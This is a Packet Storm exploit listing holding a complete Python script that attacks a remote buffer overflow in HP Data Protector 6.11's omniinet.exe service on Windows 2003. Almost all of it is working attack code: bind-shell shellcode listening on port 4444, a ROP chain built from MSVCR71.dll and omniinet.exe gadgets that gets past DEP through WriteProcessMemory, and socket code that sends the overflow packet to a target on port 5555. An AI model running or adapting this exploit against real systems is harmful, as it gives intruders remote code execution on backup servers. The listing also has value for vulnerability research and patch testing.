HP Data Protector 6.11 Remote Buffer Overflow

2011-07-02T00:00:00
ID PACKETSTORM:102733
Type packetstorm
Reporter muts
Modified 2011-07-02T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
# HP Data Protector 6.11 Remote Buffer Overflow  
# Tested on Windows 2003 R2 + DEP Enabled  
# Authors: muts & dookie  
# Reference: http://www.exploit-db.com/exploits/17458/  
# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities  
# http://www.offensive-security.com/0day/hp-dataprotector.py.txt  
  
import struct, socket, sys  
target = sys.argv[1]  
  
# bindshell - port 4444  
shellcode = ("\xbf\x83\x75\x7f\xdd\xdb\xc8\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"  
"\x56\x31\x7e\x13\x03\x7e\x13\x83\xee\x7f\x97\x8a\x21\x97\xd1"  
"\x75\xda\x67\x82\xfc\x3f\x56\x90\x9b\x34\xca\x24\xef\x19\xe6"  
"\xcf\xbd\x89\x7d\xbd\x69\xbd\x36\x08\x4c\xf0\xc7\xbc\x50\x5e"  
"\x0b\xde\x2c\x9d\x5f\x00\x0c\x6e\x92\x41\x49\x93\x5c\x13\x02"  
"\xdf\xce\x84\x27\x9d\xd2\xa5\xe7\xa9\x6a\xde\x82\x6e\x1e\x54"  
"\x8c\xbe\x8e\xe3\xc6\x26\xa5\xac\xf6\x57\x6a\xaf\xcb\x1e\x07"  
"\x04\xbf\xa0\xc1\x54\x40\x93\x2d\x3a\x7f\x1b\xa0\x42\x47\x9c"  
"\x5a\x31\xb3\xde\xe7\x42\x00\x9c\x33\xc6\x95\x06\xb0\x70\x7e"  
"\xb6\x15\xe6\xf5\xb4\xd2\x6c\x51\xd9\xe5\xa1\xe9\xe5\x6e\x44"  
"\x3e\x6c\x34\x63\x9a\x34\xef\x0a\xbb\x90\x5e\x32\xdb\x7d\x3f"  
"\x96\x97\x6c\x54\xa0\xf5\xf8\x99\x9f\x05\xf9\xb5\xa8\x76\xcb"  
"\x1a\x03\x11\x67\xd3\x8d\xe6\x88\xce\x6a\x78\x77\xf0\x8a\x50"  
"\xbc\xa4\xda\xca\x15\xc4\xb0\x0a\x99\x11\x16\x5b\x35\xc9\xd7"  
"\x0b\xf5\xb9\xbf\x41\xfa\xe6\xa0\x69\xd0\x91\xe6\xa7\x00\xf2"  
"\x80\xc5\xb6\xe5\x0c\x43\x50\x6f\xbd\x05\xca\x07\x7f\x72\xc3"  
"\xb0\x80\x50\x7f\x69\x17\xec\x69\xad\x18\xed\xbf\x9e\xb5\x45"  
"\x28\x54\xd6\x51\x49\x6b\xf3\xf1\x00\x54\x94\x88\x7c\x17\x04"  
"\x8c\x54\xcf\xa5\x1f\x33\x0f\xa3\x03\xec\x58\xe4\xf2\xe5\x0c"  
"\x18\xac\x5f\x32\xe1\x28\xa7\xf6\x3e\x89\x26\xf7\xb3\xb5\x0c"  
"\xe7\x0d\x35\x09\x53\xc2\x60\xc7\x0d\xa4\xda\xa9\xe7\x7e\xb0"  
"\x63\x6f\x06\xfa\xb3\xe9\x07\xd7\x45\x15\xb9\x8e\x13\x2a\x76"  
"\x47\x94\x53\x6a\xf7\x5b\x8e\x2e\x07\x16\x92\x07\x80\xff\x47"  
"\x1a\xcd\xff\xb2\x59\xe8\x83\x36\x22\x0f\x9b\x33\x27\x4b\x1b"  
"\xa8\x55\xc4\xce\xce\xca\xe5\xda")  
  
wpm = "\x55\x23\xe4\x77" # 77E42355 WriteProcessMemory - Win2k3   
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Return after WPM   
wpm += "\xff\xff\xff\xff" # hProcess   
wpm += "\x50\xd0\x4b\x00" # 004bd050 omniinet.exe - Address to Patch   
wpm += "\x41\x41\x41\x41" # lpBuffer placeholder (Shellcode Address)   
wpm += "\x42\x42\x42\x42" # nSize placeholder (Shellcode Size) 00001000  
wpm += "\x38\xd4\x4b\x00" # 004BD438 omniinet.exe - Pointer for Written Bytes   
  
# pre  
packet = ("\x00\x00\x27\xCA\xFF\xFE\x32\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x32\x00\x30\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00")  
  
# padding to EIP  
packet +="A"* 2004  
# Get a copy of ESP into a register for safekeeping  
packet +="\x1f\x59\x37\x7c" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN  
packet += "\x44" * 4 # junk to pop into EBP  
  
# Jump over the WPM parameters  
packet += "\xfe\x9b\x35\x7c" # 0x7c359bfe : # ADD ESP,20 # RETN  
packet += wpm  
packet += "\x44" * 4 # filler  
  
# Get EAX to point at our shellcode on the stack and overwrite the placeholder  
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN   
packet += "\x1c\x3b\x37\x7c" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN  
packet += "\x44" * 4 # filler  
packet += "\xd4\x3d\x43\x00" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
  
# Craft the shellcode size in EAX and overwrite the placeholder  
packet += "\x2e\x40\x34\x7c" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]  
packet += "\x59\x3d\x41\x41" # Value to SUB from EAX  
packet += "\x23\x62\x37\x7c" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]  
packet += "\x41\x41\x41\x41" # To be the sub-ee 41413D59  
packet += "\xe9\xfa\x36\x7c" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]  
packet += "\x44" * 4 # filler  
packet += "\x69\x60\x37\x7c" # 0x7c376069 : # MOV DWORD PTR DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]  
packet += "\x44" * 12 # filler  
  
# Point ESP to WPM and the stack and return  
packet += "\x40\xa0\x35\x7c" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x66\x61\x43\x00" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]  
packet += "\x44" * 4 # filler  
packet += "\x05\x8b\x34\x7c" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]  
packet += "\x45" * 8  
packet +="\x90" *120  
packet += shellcode  
packet +="C"* 980000  
# post  
packet +=("\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00"  
"\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00"  
"\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00"  
"\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00\x20\x00\x61\x00\x00\x00")  
  
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
sock.connect((target, 5555))  
sock.send(packet)  
sock.close()  
  
`